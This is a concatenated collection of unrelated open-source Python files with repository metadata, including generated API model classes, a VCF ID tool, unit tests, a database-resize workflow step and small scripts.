node only sees one value for one identifier, and we can omit others.
"""
| [
"laike9m@gmail.com"
] | laike9m@gmail.com |
0cc1a6763c74990c23270a72d398db34d9e14368 | c4f01eec090833762b884c2078161df087d09b0d | /Other documents/Term papers/Курсач (5 сем)/CourseWorkPolygon/venv/Lib/site-packages/pdhttp/models/wrist_button_states.py | 54f9774741221e78c328ee18e8104101b5dcb943 | [] | no_license | areyykarthik/Zhukouski_Pavel_BSU_Projects | 47a30144c5614b10af521a78fba538a0e9184efa | 3540979e680732d38e25a6b39f09338985de6743 | refs/heads/master | 2023-08-07T02:49:34.736155 | 2021-10-05T21:57:03 | 2021-10-05T21:57:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,076 | py | # coding: utf-8
"""
Robot API
Robot REST API # noqa: E501
OpenAPI spec version: 1.8.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class WristButtonStates(dict):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'timestamp': 'float'
}
attribute_map = {
'timestamp': 'timestamp'
}
def __init__(self, timestamp=None): # noqa: E501
"""WristButtonStates - a model defined in Swagger""" # noqa: E501
self._timestamp = None
self.discriminator = None
if timestamp is not None:
self.timestamp = timestamp
@property
def timestamp(self):
"""Gets the timestamp of this WristButtonStates. # noqa: E501
:return: The timestamp of this WristButtonStates. # noqa: E501
:rtype: float
"""
return self._timestamp
@timestamp.setter
def timestamp(self, timestamp):
"""Sets the timestamp of this WristButtonStates.
:param timestamp: The timestamp of this WristButtonStates. # noqa: E501
:type: float
"""
self._timestamp = timestamp
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(WristButtonStates, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, WristButtonStates):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"shist.pupust@mail.ru"
] | shist.pupust@mail.ru |
b432bf69f1eae4c948cc8044b5e361f046760d5a | 054bc8696bdd429e2b3ba706feb72c0fb604047f | /python/vcf/VCFSetID/VCFSetID.py | e2d14da422c7239b968475a01174e89a00f78923 | [] | no_license | wavefancy/WallaceBroad | 076ea9257cec8a3e1c8f53151ccfc7c5c0d7200f | fbd00e6f60e54140ed5b4e470a8bdd5edeffae21 | refs/heads/master | 2022-02-22T04:56:49.943595 | 2022-02-05T12:15:23 | 2022-02-05T12:15:23 | 116,978,485 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,450 | py | #!/usr/bin/env python3
"""
Set/Replace ID for VCF file. setID as : chr:pos:ref:alt
@Author: wavefancy@gmail.com
Usage:
VCFSetID.py [-i] [-s] [-m int]
VCFSetID.py -h | --help | -v | --version | -f | --format
Notes:
1. Read vcf file from stdin, setID as : chr:pos:ref:alt.
3. Output results to stdout.
Options:
-i Include old rsID.
-s Sort the ref and alt alleles, sorted([ref,alt])
-m int Set the maxmium ID lenght as int.
-h --help Show this screen.
-v --version Show version.
-f --format Show format example.
"""
import sys
from docopt import docopt
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE, SIG_DFL)
def ShowFormat():
'''Input File format example:'''
print('''
input vcf example(abstracted):
----------------------
chr2 13649 . G C
out vcf example:
----------------------
chr2 13649 chr2:13649:G:C G C
''');
if __name__ == '__main__':
args = docopt(__doc__, version='1.0')
#print(args)
if(args['--format']):
ShowFormat()
sys.exit(-1)
IncludeOld = False
if args['-i']:
IncludeOld = True
MAX_ID_LEN = int(args['-m']) if args['-m'] else -1
# infile.close()
output = False
for line in sys.stdin:
line = line.strip()
if line:
if output:
#output results.
ss = line.split(None, maxsplit=7)
# check if need to sort ref, alt alleles.
stemp = sorted(ss[3:5]) if args['-s'] else ss[3:5]
if IncludeOld:
ss[2] = ss[0] + ':' + ss[1] + ':' + stemp[0] + ':' + stemp[1] + ':' + ss[2]
else:
ss[2] = ss[0] + ':' + ss[1] + ':' + stemp[0] + ':' + stemp[1]
if MAX_ID_LEN > 0:
ss[2] = ss[2][0:MAX_ID_LEN]
sys.stdout.write('%s\n'%('\t'.join(ss)))
#sys.stdout.write('%s\n'%('\t'.join([ss[x] for x in idIndex])))
else:
if line.startswith('##'):
sys.stdout.write('%s\n'%(line))
elif line.startswith('#C') or line.startswith('#c'):
output = True
sys.stdout.write('%s\n'%(line))
sys.stdout.close()
sys.stderr.flush()
sys.stderr.close()
| [
"wavefancy@gmail.com"
] | wavefancy@gmail.com |
fae7eca82ace71668d57d4156e436c6965ab22b9 | 132b261b16338cb7b9297bd04eaaaafe34bde89e | /sendSMSSkillLambda/package/ask_sdk_model/interfaces/audioplayer/error.py | 0c4c22d8473612ca7097a846067b1f065118c3e7 | [
"Apache-2.0"
] | permissive | ziniman/aws-alexa-lambda-workshop | 2835b998272b01856d3dbea6481e9ee4457da2f2 | d1e291ebd3e20132098541c92735d29491bfc932 | refs/heads/master | 2020-06-25T22:58:04.814822 | 2019-09-08T10:37:00 | 2019-09-08T10:37:00 | 199,446,036 | 0 | 3 | Apache-2.0 | 2019-09-05T09:03:12 | 2019-07-29T12:11:58 | Python | UTF-8 | Python | false | false | 3,562 | py | # coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional, Union
from datetime import datetime
from ask_sdk_model.interfaces.audioplayer.error_type import ErrorType
class Error(object):
"""
:param message:
:type message: (optional) str
:param object_type:
:type object_type: (optional) ask_sdk_model.interfaces.audioplayer.error_type.ErrorType
"""
deserialized_types = {
'message': 'str',
'object_type': 'ask_sdk_model.interfaces.audioplayer.error_type.ErrorType'
} # type: Dict
attribute_map = {
'message': 'message',
'object_type': 'type'
} # type: Dict
def __init__(self, message=None, object_type=None):
# type: (Optional[str], Optional[ErrorType]) -> None
"""
:param message:
:type message: (optional) str
:param object_type:
:type object_type: (optional) ask_sdk_model.interfaces.audioplayer.error_type.ErrorType
"""
self.__discriminator_value = None # type: str
self.message = message
self.object_type = object_type
def to_dict(self):
# type: () -> Dict[str, object]
"""Returns the model properties as a dict"""
result = {} # type: Dict
for attr, _ in six.iteritems(self.deserialized_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else
x.value if isinstance(x, Enum) else x,
value
))
elif isinstance(value, Enum):
result[attr] = value.value
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else
(item[0], item[1].value)
if isinstance(item[1], Enum) else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
# type: () -> str
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
# type: () -> str
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
# type: (object) -> bool
"""Returns true if both objects are equal"""
if not isinstance(other, Error):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
# type: (object) -> bool
"""Returns true if both objects are not equal"""
return not self == other
| [
"oritalul@amazon.com"
] | oritalul@amazon.com |
873ef77356637ce0e4537e113fbf9e125a3bb52c | a3597afc5aaf15723dba35d5b114f2b3e129a168 | /mars/services/lifecycle/supervisor/tests/test_tracker.py | df62277ac9f2722e4ab8cefc3bfe49accb92f48e | [
"BSD-3-Clause",
"CC0-1.0",
"ISC",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause",
"MIT"
] | permissive | hekaisheng/mars | 5edff06194779d6005bd768dabadd9191c812cb3 | 49ce0c1c691d405040e53b8eb8d8af9b7e87ae55 | refs/heads/master | 2023-01-10T06:24:05.532213 | 2021-12-07T08:21:56 | 2021-12-07T08:21:56 | 160,764,275 | 0 | 2 | Apache-2.0 | 2021-01-10T08:43:43 | 2018-12-07T03:12:41 | Python | UTF-8 | Python | false | false | 3,052 | py | # Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pytest
from ..... import oscar as mo
from ..... import tensor as mt
from .....core import tile
from ....cluster import MockClusterAPI
from ....meta import MockMetaAPI
from ....session import MockSessionAPI
from ....storage import MockStorageAPI, DataNotExist
from ... import TileableNotTracked
from ...supervisor.tracker import LifecycleTrackerActor
@pytest.mark.asyncio
async def test_tracker():
pool = await mo.create_actor_pool("127.0.0.1", n_process=0)
async with pool:
addr = pool.external_address
session_id = "test_session"
await MockClusterAPI.create(addr)
await MockSessionAPI.create(addr, session_id=session_id)
meta_api = await MockMetaAPI.create(session_id, addr)
storage_api = await MockStorageAPI.create(session_id, addr)
try:
tracker = await mo.create_actor(
LifecycleTrackerActor,
session_id,
uid=LifecycleTrackerActor.gen_uid(session_id),
address=pool.external_address,
)
t = mt.random.rand(15, 5, chunk_size=5)
t = tile(t)
tileable_key = t.key
chunk_keys = []
for c in t.chunks:
chunk_keys.append(c.key)
await meta_api.set_chunk_meta(c, bands=[(addr, "numa-0")])
await storage_api.put(c.key, np.random.rand(5, 5))
await tracker.track(tileable_key, chunk_keys)
await tracker.incref_tileables([tileable_key])
await tracker.incref_chunks(chunk_keys[:2])
await tracker.decref_chunks(chunk_keys[:2])
await tracker.decref_tileables([tileable_key])
assert len(await tracker.get_all_chunk_ref_counts()) == 0
for chunk_key in chunk_keys:
with pytest.raises(KeyError):
await meta_api.get_chunk_meta(chunk_key)
for chunk_key in chunk_keys:
with pytest.raises(DataNotExist):
await storage_api.get(chunk_key)
with pytest.raises(TileableNotTracked):
await tracker.incref_tileables(["not_tracked"])
with pytest.raises(TileableNotTracked):
await tracker.decref_tileables(["not_tracked"])
finally:
await MockStorageAPI.cleanup(pool.external_address)
await MockClusterAPI.cleanup(pool.external_address)
| [
"noreply@github.com"
] | hekaisheng.noreply@github.com |
4600df2a769dabba26bb553fe5ece02566fc38c3 | 5598fe9705c7066407ee02245ae5f98f3fec3a54 | /utils.py | 309482bf5635e5221ceec060f59ecba73c132a36 | [] | no_license | EgorLakomkin/TopCoderSpokenLanguageRecognition | 8d2bb1608cc6d4eaf25d4bc43c48ce9e7f68bb4a | 73df1b4742a71fb825d78e7f15f3a2a54339d4ef | refs/heads/master | 2021-01-10T17:10:34.030434 | 2015-11-14T11:03:47 | 2015-11-14T11:03:47 | 46,171,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,253 | py | import os
from subprocess import check_call
from path import Path
import librosa
from cPickle import Pickler, Unpickler
import cPickle
from multiprocessing import Pool
import numpy as np
from features_storage import FeatureStorage
DATA_DIR = './data'
FEATURE_STORAGE = 'features_storage'
TRAINING_FILE = os.path.join(DATA_DIR, 'trainingset.csv')
TESTING_FILE = os.path.join(DATA_DIR, 'testingset.csv' )
FILES_DIR = os.path.join( DATA_DIR, 'data' )
def load_classes_info():
classes_dict, revert_classes_dict = {}, {}
class_idx = 0
for line in open(TRAINING_FILE):
_, language_class_name = line.strip().split(',')
if language_class_name not in classes_dict:
classes_dict[ language_class_name ] = class_idx
revert_classes_dict[ class_idx ] = language_class_name
class_idx += 1
return classes_dict, revert_classes_dict
def get_mfcc(signal, n_fft = 4096, hop_length = 1024, sr=44100, n_mfcc=20, logscaled=True):
"""Computes the mel-frequency cepstral coefficients of a signal
ARGS
signal: audio signal <number array>
n_fft: FFT size <int>
hop_length : hop length <int>
sr: sampling rate <int>
n_mfcc: number of MFC coefficients <int>
logscaled: log-scale the magnitudes of the spectrogram <bool>
RETURN
mfcc: mel-frequency cepstral coefficients <number numpy array>
"""
S = librosa.feature.melspectrogram(signal, sr=sr, n_fft=n_fft, hop_length=hop_length)
if logscaled:
log_S = librosa.logamplitude(S)
mfcc = librosa.feature.mfcc(S=log_S, n_mfcc=n_mfcc)
return mfcc
def load_test_features(test_filename, feature_func, limit = None):
pool = Pool()
test_data = get_all_test_data()
if limit:
test_data = test_data[:limit]
feature_storage = FeatureStorage( name = test_filename, base_dir = FEATURE_STORAGE )
if not feature_storage.exists():
print "Loading test from scratch"
for_features = [ (path, None) for (path, filename ) in test_data ]
X_test_transformed = pool.map( feature_func, for_features )
print "Dumping test features"
feature_storage.save( X_test_transformed )
print "Finished dumping"
else:
print "Loading test from cache"
X_test_transformed = feature_storage.load()
pool.close()
pool.terminate()
return X_test_transformed
def shuffle_in_unison_inplace(a, b):
assert a.shape[0] == b.shape[0]
p = np.random.permutation(a.shape[0])
return a[p], b[p]
def load_train_features( train_filename, feature_func, limit = None ):
feature_storage = FeatureStorage( name = train_filename, base_dir = FEATURE_STORAGE )
if not feature_storage.exists( ):
all_train_data = return_all_train_files()
if limit is not None:
all_train_data = all_train_data[:limit]
print "Started processing train"
pool = Pool()
X_train_transformed = pool.map( feature_func, all_train_data )
pool.close()
pool.terminate()
print "Dumping train features"
feature_storage.save( X_train_transformed )
else:
print "Loading train from cache"
X_train_transformed = feature_storage.load()
return X_train_transformed
def convert_to_wav(dir):
train_dir = Path( dir )
for f in train_dir.walkfiles('*.mp3'):
name = f.name.replace('.mp3', '') + '.wav'
check_call(['avconv', '-ar', '44100', '-i', str(f), os.path.abspath( os.path.join( dir, name ) )])
def get_all_test_data():
res = []
for line in open(TESTING_FILE):
filename = line.strip()
full_path = os.path.join(FILES_DIR, filename.replace('.mp3', '.wav'))
res.append( (full_path, filename) )
return res
def return_all_train_files():
all_train_data = []
classes_dict, _ = load_classes_info()
for line in open(TRAINING_FILE):
filename, language_class_name = line.strip().split(',')
filename = os.path.join(FILES_DIR, filename.replace('.mp3', '.wav'))
language_class = classes_dict[ language_class_name ]
all_train_data.append( (filename, language_class) )
return all_train_data
if __name__ == "__main__":
convert_to_wav('./data')
| [
"you@example.com"
] | you@example.com |
ff2417be8026f879c74193c9a68d160b8a26196d | c8a04384030c3af88a8e16de4cedc4ef8aebfae5 | /stubs/pandas/tests/frame/test_asof.pyi | cf6de5856ad19886ade3d96fdb920a6514d14236 | [
"MIT"
] | permissive | Accern/accern-xyme | f61fce4b426262b4f67c722e563bb4297cfc4235 | 6ed6c52671d02745efabe7e6b8bdf0ad21f8762c | refs/heads/master | 2023-08-17T04:29:00.904122 | 2023-05-23T09:18:09 | 2023-05-23T09:18:09 | 226,960,272 | 3 | 2 | MIT | 2023-07-19T02:13:18 | 2019-12-09T20:21:59 | Python | UTF-8 | Python | false | false | 718 | pyi | # Stubs for pandas.tests.frame.test_asof (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
# pylint: disable=unused-argument,redefined-outer-name,no-self-use,invalid-name
# pylint: disable=relative-beyond-top-level
from typing import Any
def date_range_frame() -> Any:
...
class TestFrameAsof:
def test_basic(self, date_range_frame: Any) -> None:
...
def test_subset(self, date_range_frame: Any) -> None:
...
def test_missing(self, date_range_frame: Any) -> None:
...
def test_all_nans(self, date_range_frame: Any) -> None:
...
def test_time_zone_aware_index(self, stamp: Any, expected: Any) -> None:
...
| [
"josua.krause@gmail.com"
] | josua.krause@gmail.com |
2e908b9f14dad212166d5d26c5846a4014df8854 | 750d8ade6abc2b3bd6a24e660a4992114db6ac0c | /lib/music/plex/__init__.py | 6b0e02e3511aa7df7bc5c68e754877876aaa33c2 | [] | no_license | dskrypa/music_manager | 8a00a4bd7b32a87dab2441614c94346fa87c4f13 | ad7265fbd203962a4bf9cf6444c8e10d561a307c | refs/heads/main | 2023-08-09T06:26:46.592118 | 2023-08-08T11:38:08 | 2023-08-08T11:38:08 | 234,730,172 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,016 | py | """
Package for working with the Plex API, and for syncing Plex ratings with ratings stored in ID3 tags.
Note on fetchItems:
The kwargs to fetchItem/fetchItems use __ to access nested attributes, but the only nested attributes available are
those that are returned in the items in ``plex.server.query(plex._ekey(search_type))``, not the higher level objects.
Example available attributes::\n
>>> data = plex.server.query(plex._ekey('track'))
>>> media = [c for c in data[0]]
>>> for m in media:
... m
... m.attrib
... print(', '.join(sorted(m.attrib)))
... for part in m:
... part
... part.attrib
... print(', '.join(sorted(part.attrib)))
...
<Element 'Media' at 0x000001E4E3971458>
{'id': '76273', 'duration': '238680', 'bitrate': '320', 'audioChannels': '2', 'audioCodec': 'mp3', 'container': 'mp3'}
audioChannels, audioCodec, bitrate, container, duration, id
<Element 'Part' at 0x000001E4E48D9458>
{'id': '76387', 'key': '/library/parts/76387/1555183134/file.mp3', 'duration': '238680', 'file': '/path/to/song.mp3', 'size': '9773247', 'container': 'mp3', 'hasThumbnail': '1'}
container, duration, file, hasThumbnail, id, key, size
>>> data = plex.server.query(plex._ekey('album'))
>>> data[0]
<Element 'Directory' at 0x000001E4E3C92458>
>>> print(', '.join(sorted(data[0].attrib.keys())))
addedAt, guid, index, key, loudnessAnalysisVersion, originallyAvailableAt, parentGuid, parentKey, parentRatingKey, parentThumb, parentTitle, ratingKey, summary, thumb, title, type, updatedAt, year
>>> elements = [c for c in data[0]]
>>> for e in elements:
... e
... e.attrib
... for sub_ele in e:
... sub_ele
... sub_ele.attrib
...
<Element 'Genre' at 0x000001E4E3C929F8>
{'tag': 'K-pop'}
Example playlist syncs::\n
>>> plex.sync_playlist('K-Pop 3+ Stars', userRating__gte=6, genre__like='[kj]-?pop')
2019-06-01 08:53:39 EDT INFO __main__ 178 Creating playlist K-Pop 3+ Stars with 485 tracks
>>> plex.sync_playlist('K-Pop 4+ Stars', userRating__gte=8, genre__like='[kj]-?pop')
2019-06-01 08:54:13 EDT INFO __main__ 178 Creating playlist K-Pop 4+ Stars with 257 tracks
>>> plex.sync_playlist('K-Pop 5 Stars', userRating__gte=10, genre__like='[kj]-?pop')
2019-06-01 08:54:22 EDT INFO __main__ 178 Creating playlist K-Pop 5 Stars with 78 tracks
>>> plex.sync_playlist('K-Pop 5 Stars', userRating__gte=10, genre__like='[kj]-?pop')
2019-06-01 08:54:58 EDT VERBOSE __main__ 196 Playlist K-Pop 5 Stars does not contain any tracks that should be removed
2019-06-01 08:54:58 EDT VERBOSE __main__ 208 Playlist K-Pop 5 Stars is not missing any tracks
2019-06-01 08:54:58 EDT INFO __main__ 212 Playlist K-Pop 5 Stars contains 78 tracks and is already in sync with the given criteria
Object and element attributes and elements available for searching:
- track:
- attributes: addedAt, duration, grandparentGuid, grandparentKey, grandparentRatingKey, grandparentThumb,
grandparentTitle, guid, index, key, originalTitle, parentGuid, parentIndex, parentKey, parentRatingKey,
parentThumb, parentTitle, ratingKey, summary, thumb, title, type, updatedAt
- elements: media
- album:
- attributes: addedAt, guid, index, key, loudnessAnalysisVersion, originallyAvailableAt, parentGuid, parentKey,
parentRatingKey, parentThumb, parentTitle, ratingKey, summary, thumb, title, type, updatedAt, year
- elements: genre
- artist:
- attributes: addedAt, guid, index, key, lastViewedAt, ratingKey, summary, thumb, title, type, updatedAt,
userRating, viewCount
- elements: genre
- media:
- attributes: audioChannels, audioCodec, bitrate, container, duration, id
- elements: part
- genre:
- attributes: tag
- part:
- attributes: container, duration, file, hasThumbnail, id, key, size
:author: Doug Skrypa
"""
from .server import LocalPlexServer
| [
"dskrypa@gmail.com"
] | dskrypa@gmail.com |
12c9bc75b85fee4fddb162344fe499e27e861437 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03475/s093541910.py | fba06f3b1736933db986f94190f598cc10fff7bf | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | N=int(input())
l=[0]*N
for i in range(N-1):
c,s,f=map(int,input().split())
l[i]=c+s
for j in range(i):
l[j]=max(l[j],s,-(-l[j]//f)*f)+c
for i in l:print(i) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
b201b0ea2d5386b9e8b4dafdfd2fcb3d93cd1298 | b665fe52aceca20944f5c7dfc74688370e514666 | /dbaas/workflow/steps/redis/resize/__init__.py | 5dca9388a256f4780a11cbdaff1ff49171827266 | [] | no_license | tsunli/database-as-a-service | 5e68ee22b1b46d30c6d83278407494971097d451 | 73573d495f62829259f656dfa0b642b9be4f2ead | refs/heads/master | 2021-01-24T15:06:42.029936 | 2015-07-02T21:42:44 | 2015-07-02T21:42:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,626 | py | # -*- coding: utf-8 -*-
import logging
from dbaas_cloudstack.models import HostAttr
from util import exec_remote_command
from workflow.exceptions.error_codes import DBAAS_0015
from util import full_stack
from util import build_context_script
LOG = logging.getLogger(__name__)
def run_vm_script(workflow_dict, context_dict, script):
try:
instances_detail = workflow_dict['instances_detail']
final_context_dict = dict(context_dict.items() + workflow_dict['initial_context_dict'].items())
for instance_detail in instances_detail:
instance = instance_detail['instance']
host = instance.hostname
host_csattr = HostAttr.objects.get(host=host)
final_context_dict['HOSTADDRESS'] = instance.address
final_context_dict['PORT'] = instance.port
command = build_context_script(final_context_dict, script)
output = {}
return_code = exec_remote_command(server = host.address,
username = host_csattr.vm_user,
password = host_csattr.vm_password,
command = command,
output = output)
if return_code:
raise Exception, "Could not run script. Output: {}".format(output)
return True
except Exception:
traceback = full_stack()
workflow_dict['exceptions']['error_codes'].append(DBAAS_0015)
workflow_dict['exceptions']['traceback'].append(traceback)
return False
| [
"raposo.felippe@gmail.com"
] | raposo.felippe@gmail.com |
d26831364d5626bb2c597b32de481c75ecd14631 | 29a435f155f6b49b97e41241ef01274a15e9b407 | /collective/packagekit/browser/util_view.py | 314997a577dbc4bf2c679f3769306bb1a9686ce2 | [] | no_license | kagesenshi/collective.packagekit | b55d1763bf97e884b89c9eb8f9b51c497f8ad80b | 1fcefc10f1bf71b60dd671dff4783dc390c87e63 | refs/heads/master | 2020-06-03T18:02:22.124810 | 2011-12-29T14:18:44 | 2011-12-29T14:18:44 | 3,011,085 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,146 | py | from five import grok
from collective.packagekit.pkappbehavior import IPackageKitApplicationBehavior
from zope.interface import Interface
from itertools import izip
grok.templatedir('templates')
from zope.security import checkPermission
class PKAppUtilView(grok.View):
grok.name('pkapp_util')
grok.context(IPackageKitApplicationBehavior)
def render(self):
return str(self)
def gridslice(self, items, size=5):
l = items
n = size
# http://taylanpince.com/blog/posts/slicing-a-list-into-equal-groups-in-python/
return [s for s in izip(*[iter(l)] * n)] + [l[len(l) - (len(l) % n):]]
def fedora_packages(self):
pkgs = [i['identifier'] for i in self.context.pk_packages if (
i['distribution'] == 'fedora')]
return set(pkgs)
def images(self):
return self.context.portal_catalog(
path={
'query': '/'.join(self.context.getPhysicalPath()),
'depth': 1
},
portal_type='Image'
)
def can_add(self):
return checkPermission('cmf.AddPortalContent', self.context)
| [
"izhar@inigo-tech.com"
] | izhar@inigo-tech.com |
bed7e0c91fb9452819a192221524a55e26a1d1c1 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2189/60795/256420.py | 444dea8a9fbb5a06c9caaf11ecf79c4b1dc786bf | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,327 | py | def test(num):
num = int(num)
at = 0
th, hu, de, fa = 0, 0, 0, 0
if num > 10 & num < 100:
fa = num % 10
de = (num - fa) / 10
at = de * de + fa * fa
elif num > 100 & num < 1000:
hu = num / 100
de = num % 100 / 10
fa = num % 100 % 10
at = hu * hu + de * de + fa * fa
elif num > 1000:
th = num / 1000
hu = num % 1000 / 100
de = num % 1000 % 100 / 10
fa = num % 1000 % 100 % 10
at = th * th + hu * hu + de * de + fa * fa
else:
at = -1
return at
T=int(input())
for i in range(0,T):
borad=input()
num=int(input())
p=True
number=0
while p:
num=number+num
sum = test(num)
ttt = 0
if sum == -1:
p=False
else:
for i in range(0, 10):
sum = test(sum)
sum = int(sum)
if sum == 100:
ttt = 1
break
elif sum == 1:
ttt = 1
break
elif sum == 10:
ttt = 1
break
elif sum == 1000:
ttt = 1
break
if ttt == 1:
p=True
print(num)
number=number+1 | [
"1069583789@qq.com"
] | 1069583789@qq.com |
ba81c2aa4666451fbfbd38a5a4791bfb95c2c518 | 2161711dcdc06abe39d96082edcc91ba4de95668 | /test/test_asset_database_api.py | 5ea2debeab40f54f3099df4feb90cffd954ce57f | [] | no_license | PriceTT/swagger-piwebapi-python | 7eb25c329b33a76785cdb0484fae0dfb354722e2 | 20a4a47a38dfe7051b1a35831fb6cd3d2a19679a | refs/heads/master | 2021-06-18T21:21:48.808589 | 2017-06-15T18:44:48 | 2017-06-15T18:44:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,687 | py | # coding: utf-8
"""
PI Web API 2017 Swagger Spec
Swagger Spec file that describes PI Web API
OpenAPI spec version: 1.9.0.266
Contact: techsupport@osisoft.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import swagger_client
from swagger_client.rest import ApiException
from swagger_client.apis.asset_database_api import AssetDatabaseApi
class TestAssetDatabaseApi(unittest.TestCase):
""" AssetDatabaseApi unit test stubs """
def setUp(self):
self.api = swagger_client.apis.asset_database_api.AssetDatabaseApi()
def tearDown(self):
pass
def test_asset_database_add_referenced_element(self):
"""
Test case for asset_database_add_referenced_element
Add a reference to an existing element to the specified database.
"""
pass
def test_asset_database_create_analysis_category(self):
"""
Test case for asset_database_create_analysis_category
Create an analysis category at the Asset Database root.
"""
pass
def test_asset_database_create_analysis_template(self):
"""
Test case for asset_database_create_analysis_template
Create an analysis template at the Asset Database root.
"""
pass
def test_asset_database_create_attribute_category(self):
"""
Test case for asset_database_create_attribute_category
Create an attribute category at the Asset Database root.
"""
pass
def test_asset_database_create_element(self):
"""
Test case for asset_database_create_element
Create a child element.
"""
pass
def test_asset_database_create_element_category(self):
"""
Test case for asset_database_create_element_category
Create an element category at the Asset Database root.
"""
pass
def test_asset_database_create_element_template(self):
"""
Test case for asset_database_create_element_template
Create a template at the Asset Database root. Specify InstanceType of \"Element\" or \"EventFrame\" to create element or event frame template respectively. Only these two types of templates can be created.
"""
pass
def test_asset_database_create_enumeration_set(self):
"""
Test case for asset_database_create_enumeration_set
Create an enumeration set at the Asset Database.
"""
pass
def test_asset_database_create_event_frame(self):
"""
Test case for asset_database_create_event_frame
Create an event frame.
"""
pass
def test_asset_database_create_security_entry(self):
"""
Test case for asset_database_create_security_entry
Create a security entry owned by the asset database.
"""
pass
def test_asset_database_create_table(self):
"""
Test case for asset_database_create_table
Create a table on the Asset Database.
"""
pass
def test_asset_database_create_table_category(self):
"""
Test case for asset_database_create_table_category
Create a table category on the Asset Database.
"""
pass
def test_asset_database_delete(self):
"""
Test case for asset_database_delete
Delete an asset database.
"""
pass
def test_asset_database_delete_security_entry(self):
"""
Test case for asset_database_delete_security_entry
Delete a security entry owned by the asset database.
"""
pass
def test_asset_database_export(self):
"""
Test case for asset_database_export
Export the asset database.
"""
pass
def test_asset_database_find_analyses(self):
"""
Test case for asset_database_find_analyses
Retrieve analyses based on the specified conditions.
"""
pass
def test_asset_database_find_element_attributes(self):
"""
Test case for asset_database_find_element_attributes
Retrieves a list of element attributes matching the specified filters from the specified asset database.
"""
pass
def test_asset_database_find_event_frame_attributes(self):
"""
Test case for asset_database_find_event_frame_attributes
Retrieves a list of event frame attributes matching the specified filters from the specified asset database.
"""
pass
def test_asset_database_get(self):
"""
Test case for asset_database_get
Retrieve an Asset Database.
"""
pass
def test_asset_database_get_analysis_categories(self):
"""
Test case for asset_database_get_analysis_categories
Retrieve analysis categories for a given Asset Database.
"""
pass
def test_asset_database_get_analysis_templates(self):
"""
Test case for asset_database_get_analysis_templates
Retrieve analysis templates based on the specified criteria. By default, all analysis templates in the specified Asset Database are returned.
"""
pass
def test_asset_database_get_attribute_categories(self):
"""
